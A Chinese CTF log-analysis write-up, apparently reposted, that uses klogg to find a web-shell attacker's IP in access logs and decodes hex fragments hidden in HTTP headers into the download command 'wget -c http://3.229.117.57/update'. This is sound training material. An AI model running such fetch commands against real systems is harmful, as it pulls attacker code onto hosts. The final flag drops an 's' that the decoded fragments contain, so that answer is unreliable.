当前位置: 首页 > news >正文

【CTF-MISC-日志分析】使用klogg分析日志内容

工具

klogg 22.06.0.1289:https://github.com/variar/klogg/releases/tag/v22.06

第一题

题目描述

你是一名安全分析师,公司的Web服务器可能被攻击者植入了后门。
请分析提供的访问日志,找出以下信息:
攻击者使用的恶意IP地址是什么?flag格式:flag{IP地址},例如flag{192.168.10.10}

解析

用klogg打开日志,勾选Enable regular expression logical combining的功能,然后输入命令:
“cmd” or “shell”
搜索到了198.51.100.42这个地址相关的请求shell和cmd明显恶意文件
所以这个IP就是地址

198.51.100.42--[16/Jun/2023:00:16:10+0000]"GET /cmd.php?id=328491&action=update&token=731053 HTTP/1.1"301 1061"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15""X-Custom-Header:733a2f2f332e"198.51.100.42--[16/Jun/2023:00:16:33+0000]"GET /shell.php?id=996606&action=edit&token=650160 HTTP/1.1"304 2471"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36""X-Custom-Header:372e35372f75"198.51.100.42--[16/Jun/2023:00:15:53+0000]"GET /cmd.php?id=689443&action=delete&token=981439 HTTP/1.1"200 7233"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0""X-Forwarded-For:127.0.0.1, 632068747470"198.51.100.42--[16/Jun/2023:00:16:46+0000]"GET /webshell.php?id=465538&action=view&token=504473 HTTP/1.1"302 1755"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36""Authorization:Bearer 7064617465"

答案

答案:flag{198.51.100.42}

第二题

题目描述

攻击者执行的完整命令是什么?最终提交flag格式为flag{执行的完整命令},如flag{ls -la /tmp}

解析

由第一题可知,攻击者是在16/Jun/2023:00:15到16/Jun/2023:00:16之间执行的恶意请求,所以我们要查看攻击者在16/Jun/2023:00:10到16/Jun/2023:00:19之间的所有日志信息,输入命令:
“198.51.100.42” and “16/Jun/2023:00:1”

按时间顺序排列:

198.51.100.42--[16/Jun/2023:00:15:35+0000]"GET /system.php?id=897641&action=edit&token=422278 HTTP/1.1"302 9812"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15""Via:1.1 proxy1, 1.1 proxy2, 77676574202d"198.51.100.42--[16/Jun/2023:00:15:53+0000]"GET /cmd.php?id=689443&action=delete&token=981439 HTTP/1.1"200 7233"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0""X-Forwarded-For:127.0.0.1, 632068747470"198.51.100.42--[16/Jun/2023:00:16:10+0000]"GET /cmd.php?id=328491&action=update&token=731053 HTTP/1.1"301 1061"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15""X-Custom-Header:733a2f2f332e"198.51.100.42--[16/Jun/2023:00:16:21+0000]"GET /exec.php?id=713079&action=delete&token=150053 HTTP/1.1"502 5275"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15""Via:1.1 proxy1, 1.1 proxy2, 3232392e3131"198.51.100.42--[16/Jun/2023:00:16:33+0000]"GET /shell.php?id=996606&action=edit&token=650160 HTTP/1.1"304 2471"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36""X-Custom-Header:372e35372f75"198.51.100.42--[16/Jun/2023:00:16:46+0000]"GET /webshell.php?id=465538&action=view&token=504473 HTTP/1.1"302 1755"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36""Authorization:Bearer 7064617465"

攻击者将命令拆分成多个部分隐藏在HTTP头中。

让我将这些十六进制编码片段按时间顺序拼接并解码

解码每个HTTP头中的十六进制数据:

  1. 00:15:35-77676574202dwget -
  2. 00:15:53-632068747470c http
  3. 00:16:10-733a2f2f332es://3.
  4. 00:16:21-3232392e3131229.11
  5. 00:16:33-372e35372f757.57/u
  6. 00:16:46-7064617465pdate

按时间顺序拼接:

wget - c http s://3. 229.11 7.57/u pdate

去掉空格并合理组合:
wget -c http://3.229.117.57/update

答案

答案:flag{wget -c http://3.229.117.57/update}

http://www.jsqmd.com/news/1263228/

相关文章:

  • 工业AI落地关键技术:数据工程与模型轻量化实践
  • Video2X:开源AI视频超分辨率与帧率提升的终极解决方案
  • AI智能体记忆架构实战:从原理到LangChain集成与性能优化
  • 2026年7月帝舵售后多信源验证:从热线到网点地址,客户体验天差地别 - 速递信息
  • Dify实战指南:从零构建Agentic AI应用与可视化工作流
  • 2026年7月乐无忧镜片厂商推荐,渐进多焦点,满足多样视力需求 - 品牌推荐师
  • SSA-LSTM优化时间序列预测:原理与工程实践
  • 如何实现微信聊天记录的终极备份?三步完成完整导出与智能数据分析
  • C++编程避坑指南:从内存管理到多线程的常见陷阱与解决方案
  • 2026年屋顶稀土隔热行业深度评测:技术之争与头部服务商实力拆解
  • FastWan-QAD:1.8秒生成5秒视频的量化感知蒸馏技术解析
  • AI模型微调引发安全对齐崩溃的机制与应对
  • 154k Stars 开源神器 Firecrawl v2.11.0 全解|网页抓取 API 从源码、部署到 RAG 实战终极指南
  • 物理计算驱动AI:Un-0模型原理与模拟实现
  • 涂胶显影机(Track)技术岗初级工程师完整JD(12维度)+对外简化版JD
  • AI编程助手套餐选择指南:从额度倍率到弹性工作流构建
  • Krea2升级实战:RAW+Turbo模式解析与4K放大工作流优化
  • 2026最新款图吧工具箱下载+使用教程(附下载链接)
  • Agentic Workflow 四大模式代码实测:Reflection 比 Multi-agent 更省成本?在 Taotoken 平台的意外发现
  • 深入解析Linux内核函数指针原理与应用
  • 贵阳黄金回收哪家价格公道?看懂计价公式不被临时压价 - 每日生活报
  • 3分钟构建专属提瓦特:KCN-GenshinServer原神私服图形化部署完全指南
  • C++ Socket编程实战:基于select实现高效多客户端服务端
  • SteamAutoCrack:3分钟掌握游戏自主权的终极解决方案
  • 如何用550元打造FOC轮腿机器人:从零到平衡行走的完整指南
  • 速度提高几百倍,记一次数据结构在实际工作中的运用
  • 2026 医疗陪诊顾问 (陪诊师)8 月班开启报名:普通人入行路径全解析 - 资讯速览
  • 盾构施工无人值守管控体系,无线网桥打通盾构机 PLC 与地面指挥平台双向传输链路案例
  • MSO算法与VMD-CNN-LSTM融合的工业故障诊断优化
  • 涂胶显影机(Track)高级工程师14维简历